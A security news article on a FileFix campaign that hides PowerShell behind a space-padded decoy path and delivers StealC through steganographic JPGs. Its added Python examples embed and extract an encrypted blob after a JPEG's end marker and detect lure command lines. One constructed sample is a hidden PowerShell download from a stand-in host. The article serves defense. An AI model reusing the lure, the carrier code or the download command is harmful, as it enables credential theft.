New FileFix Attack Drops StealC Payload

FileFix's latest evolutions show how a clever user-interaction trick plus a dusting of steganography can turn familiar OS features into a stealthy malware-delivery pipeline. Security researchers observed an active campaign that hides a second-stage PowerShell script and encrypted payloads inside seemingly innocuous JPG images.

The initial FileFix stage pushes a downloader that retrieves the image, extracts the embedded code, and decrypts and executes the payloads in memory. That chain results in a final-stage info stealer, StealC, being dropped. The info stealer can harvest browser credentials, crypto wallets, messaging app data, cloud credentials, and more, delivered in a way designed to evade many existing detections.

An attack campaign initially discovered by Acronis researchers has elevated FileFix from proof-of-concept curiosity to a multistage, production-capable attack using steganography to conceal code and encrypted executables inside images hosted on developer hosting services. In cybersecurity, steganography is the practice of concealing a secret message or data within an ordinary, non-secret file or message to hide its existence from unauthorized parties.

Unlike cryptography, which scrambles data to make it unreadable, steganography hides the fact that sensitive information is present by embedding it within seemingly innocuous carrier files like images, audio, or video files.

Rather than serving the second-stage script as a plainly named .ps1 file or an executable on the web, the attacker embedded the data within a JPG. When the initial command runs, it downloads that image, parses the hidden payload from the image bytes, and loads the decoded artifacts into memory for execution, leaving only an image download in many telemetry trails. This design increases both operational opacity and deception. Defenders seeing an image fetch are less likely to treat that activity as a binary payload retrieval.

Acronis' analysis shows the attacker layered obfuscation measures across attack stages:

  • The first-stage PowerShell itself appears as an innocuous path string to the end user, but actually contains an obfuscated command that fragments, decodes, and reconstructs subsequent stages.
  • The image-parsing stage extracts a Base64-like blob from the image bytes, which the script then decrypts and decompresses into an in-memory loader. That loader, written in Go and built to shield its strings and indicators from static analysis, performs sandbox and VM checks and only then launches the final StealC payload.
  • The combined effect reduces the number of clear indicators that endpoint detection tools and analysts rely on, shifting the attack's telemetry toward mundane events: a clipboard paste, a File Explorer address bar navigation, and an image download.
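The extraction chain in the second bullet is easier to reason about with code in hand. The Python below is an added example written for this article, not code from the campaign, from Acronis, or from the loader itself: it builds a constructed JPEG carrier with a Base64 blob (gzip compressed and RC4 encrypted, an assumed cipher) appended after the image's EOI marker between made-up delimiters, recovers the stage the way a loader would, and, more usefully for a defender, triages any JPEG for data past EOI without needing the key. The delimiters, key, cipher and stand-in stage are all assumptions; the page does not say how the real campaign laid out its blob.

```python
import base64
import gzip
import re

# Layout assumptions for this example (the page does not describe the real
# campaign's blob format): the blob sits after the JPEG EOI marker, between
# two fixed delimiters, and is Base64(RC4(gzip(stage))).
BLOB_START = b"<<B64>>"
BLOB_END = b"<</B64>>"
JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
# Constructed key and stand-in second stage; neither is from the real campaign.
KEY = b"example-key"
STAGE2 = b'Write-Host "stand-in for the decrypted second stage"; $loader = "not-a-real-loader"'


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 as a stand-in stream cipher (symmetric: encrypts and decrypts)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def minimal_jpeg() -> bytes:
    """Smallest JPEG skeleton a segment walker accepts: SOI, one JFIF APP0, EOI."""
    app0 = b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return JPEG_SOI + app0 + JPEG_EOI


def build_carrier(stage: bytes, key: bytes) -> bytes:
    """Attacker-side embedding (constructed): gzip -> RC4 -> Base64, appended after EOI."""
    blob = base64.b64encode(rc4(key, gzip.compress(stage)))
    return minimal_jpeg() + BLOB_START + blob + BLOB_END


def jpeg_end(image: bytes) -> int:
    """Offset just past the EOI marker, found by walking JPEG segments rather than
    searching for FF D9, so an EXIF thumbnail's own EOI cannot mislead the cut point."""
    if not image.startswith(JPEG_SOI):
        raise ValueError("not a JPEG (missing SOI)")
    pos = 2
    while pos + 1 < len(image):
        if image[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = image[pos + 1]
        if marker == 0xFF:                    # fill byte
            pos += 1
            continue
        if marker == 0xD9:                    # EOI
            return pos + 2
        if marker in (0x01, 0xD8) or 0xD0 <= marker <= 0xD7:   # standalone markers
            pos += 2
            continue
        seglen = int.from_bytes(image[pos + 2:pos + 4], "big")
        pos += 2 + seglen
        if marker == 0xDA:                    # SOS: skip entropy-coded data to the next real marker
            while pos + 1 < len(image):
                nxt = image[pos + 1]
                if image[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def trailing_bytes(image: bytes) -> bytes:
    """Everything past EOI. A well-formed JPEG ends there, so this should be empty."""
    return image[jpeg_end(image):]


def extract_stage(image: bytes, key: bytes) -> bytes:
    """Analyst-side reversal of the chain the page describes: find the delimited
    blob after EOI, Base64-decode, decrypt, gunzip. Returns the plaintext stage."""
    tail = trailing_bytes(image)
    m = re.search(re.escape(BLOB_START) + rb"([A-Za-z0-9+/=\r\n]+)" + re.escape(BLOB_END), tail)
    if not m:
        raise ValueError("no delimited blob after EOI")
    return gzip.decompress(rc4(key, base64.b64decode(m.group(1))))


def triage(image: bytes) -> dict:
    """Defender-side check that needs no key: flag any data after EOI and report
    the longest Base64-looking run in it, which is what this chain leaves behind."""
    tail = trailing_bytes(image)
    runs = re.findall(rb"[A-Za-z0-9+/=]{64,}", tail)
    return {
        "trailing_len": len(tail),
        "base64_run_len": max((len(r) for r in runs), default=0),
        "suspicious": len(tail) > 0,
    }


if __name__ == "__main__":
    carrier = build_carrier(STAGE2, KEY)
    print(triage(carrier))
    print(extract_stage(carrier, KEY).decode())
```

The `triage` function is the piece worth reusing: run it over image downloads your proxy or EDR already captures, and a JPG with hundreds of bytes past EOI stops looking like "just an image download". A real campaign may instead hide the blob inside a metadata segment or in pixel data, so treat the post-EOI check as one heuristic, not the whole answer.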

Embedding a payload into an image supplies several operational advantages for an attacker:

  • First, it hides payloads from simple URL or file-type filters, as many detection stacks focus on executable file extensions and script downloads; image files often receive less scrutiny.
  • Second, when the payload resides on benign hosting, for example, a Bitbucket-hosted image, defenders face harder attribution and takedown decisions, and the hosting provider's standard traffic patterns help the malicious file blend into noise.
  • Third, loading and decrypting payloads in memory avoids writing disk artifacts that trigger forensic alarms. In short, steganography complements FileFix's social-engineering root by reducing noisy indicators and increasing the attack's dwell time and chances of success.

FileFix and How Ransomware Operators Can Use It

FileFix is a user-assisted execution trick that evolved from the ClickFix family of attacks. Where ClickFix coaxed targets into pasting malicious PowerShell into the Run dialog or a terminal, FileFix instead abuses the Windows File Explorer address bar as the execution vector.

The social-engineering bait presents what appears to be a legitimate file path (an "incident report" PDF, for example) and instructs the user to copy it and paste it into File Explorer. In reality, the page's copy action places a crafted string on the clipboard: a hidden PowerShell command first, then padding, then the normal-looking path, so the path is what the user notices while the command rides along with it.

When pasted into the Explorer address field and executed, the OS acts on the payload, often without obvious prompts. Hence, a user believes they have only opened a file while, behind the scenes, a command executes.

Technically, FileFix abuses the way the Explorer address bar hands a pasted string to the shell: if the string begins with an executable and its arguments, Explorer launches it rather than navigating to a folder. Earlier ClickFix lures, and the original FileFix proof of concept, hid the real command by following it with a "#" comment marker and the decoy path; the variant observed in this campaign instead pads the command with a long run of spaces before the decoy path, so only the path remains visible in the address bar while the full string, command included, is still on the clipboard and is still what executes.

That change sidesteps simple indicator rules that look for the "#" character and other well-known ClickFix signatures. The method works because users trust what the UI shows them, which makes the user the weakest exploitable link, and because defenders who rely on pattern-matching for known markers miss a variant that simply omits them.
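The two separator styles just described (a "#" comment versus whitespace padding) are what a detection should key on, rather than the "#" alone. The Python below is an added example, not code from the article or from Acronis: it runs a classifier over constructed process-creation events (Sysmon Event ID 1 style fields, not real telemetry) and flags a LOLBIN command line that ends in a decoy document path reached through either separator. It assumes the pasted string reaches the child process's command line intact, which is how the proof of concept works since Explorer passes the text to the launched executable; the LOLBIN list, the document extensions and the six-space threshold are tuning assumptions.

```python
import re

# Executables an Explorer address-bar paste can launch directly. The list is an
# assumption for this example; extend it to match your environment.
LOLBINS = r"(?:powershell|pwsh|cmd|mshta|cscript|wscript|rundll32|regsvr32|certutil|curl|bitsadmin)"
LEAD = re.compile(
    r'^\s*"?(?:[A-Za-z]:\\(?:[^"\\]+\\)*)?' + LOLBINS + r'(?:\.exe)?"?(?:\s|$)', re.I
)
# The decoy: a separator (a "#" comment or a run of at least six spaces/tabs)
# followed by a Windows path with a document-like extension at the very end.
DECOY = re.compile(
    r'(?P<sep>#|[ \t]{6,})\s*(?P<path>(?:[A-Za-z]:\\|\\\\)[^\r\n"]*?\.(?:pdf|docx?|xlsx?|pptx?|txt|zip))\s*$',
    re.I,
)
# Secondary signal: flags that make a pasted PowerShell quieter than a user's own.
QUIET = re.compile(r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|ep\s+bypass|e(?:nc(?:odedcommand)?)?)\b", re.I)


def analyze_event(event: dict) -> dict:
    """Classify one process-creation event (Sysmon Event ID 1 style fields)."""
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").lower()
    lead = LEAD.match(cmd)
    decoy = DECOY.search(cmd) if lead else None
    variant = None
    if decoy:
        variant = "hash-comment" if decoy.group("sep") == "#" else "whitespace-padding"
    return {
        "suspicious": decoy is not None,
        "variant": variant,
        "decoy_path": decoy.group("path") if decoy else None,
        # Explorer as parent is expected for FileFix but also for a user launching a shell,
        # so it is context for triage, not a verdict on its own.
        "parent_is_explorer": parent.endswith("\\explorer.exe") or parent == "explorer.exe",
        "hidden_or_bypass": bool(lead and QUIET.search(cmd)),
    }


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {   # original FileFix/ClickFix shape: a "#" comment hides the decoy from PowerShell
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell.exe -c "ping example.invalid" # C:\company\internal-secure\incident-report.pdf',
    },
    {   # padded variant: the decoy path is separated from the command by a run of spaces
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell.exe -NoP -W Hidden -c "iwr https://example.invalid/x.jpg -OutFile $env:TEMP\x.jpg"'
                       + " " * 40 + r"C:\company\incident-report.pdf",
    },
    {   # user opened PowerShell from the Start menu: explorer parent, nothing else
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"',
    },
    {   # a non-LOLBIN handling a document path
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'"C:\Program Files\Tool\tool.exe" --config C:\data\report.pdf',
    },
    {   # LOLBIN with a document path but no decoy separator
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c type C:\notes.txt",
    },
]


def scan(events) -> list:
    """Return only the flagged events with their verdicts attached."""
    flagged = []
    for ev in events:
        verdict = analyze_event(ev)
        if verdict["suspicious"]:
            flagged.append({**ev, **verdict})
    return flagged


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["variant"], "->", hit["decoy_path"])
```

The point of `DECOY` is that the decoy path is the stable part of the lure: the attacker can drop the "#", change the padding width, or swap PowerShell for another LOLBIN, but the user-facing file path still has to sit at the end of the string, and a shell command that ends in a document path it never references is unusual enough to be worth an alert.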

The attack campaign to drop StealC is not the first time a threat actor has used FileFix in the wild. The method crossed from research forums into criminal practice when the Interlock ransomware group adopted FileFix to install remote access Trojans (RATs) and later ransomware components.

Reporting shows Interlock used the original PoC technique in earlier cases, deploying FileFix to drop remote access tools that enabled lateral movement and data exfiltration before encryption. The group's use of FileFix confirms a familiar pattern: techniques that researchers disclose or demonstrate are quickly weaponized by criminals once the published method proves effective in practice.

FileFix's appeal stems from combining low-cost social engineering with high reward. The required infrastructure is minimal: a convincing phishing page, somewhere to host the payload images or scripts, and a clipboard-copy mechanism that masks the malicious part of the string. Because the attack depends primarily on human behavior (a user following an instruction), it needs neither zero-day exploits nor a complex malware-signing infrastructure.

That fact makes FileFix attractive for financially driven threat actors pushing info-stealers like StealC and higher-tier threat groups seeking initial access for ransomware campaigns. The recent steganography layer increases this scalability by enabling modular payloads: attackers can swap in different in-memory loaders and final-stage payloads without changing the front-end phishing lure.

FileFix demonstrates how small changes in attack surface, leveraging a trusted UI element and hiding code inside apparently benign media, can dramatically increase the stealth and reach of relatively unsophisticated social-engineering campaigns.

The recent campaigns that combine FileFix with steganography underline a critical truth for defenders: attackers do not need novel exploits when they can convert legitimate OS behaviors and benign file types into reliable delivery mechanisms. Stopping such hybrid attacks requires layered controls that reduce the value of user-directed execution, raise the cost of invisible payload hosting, and detect the subtle telemetry patterns that reveal multistage, in-memory infections.

Karolis Liucveikis
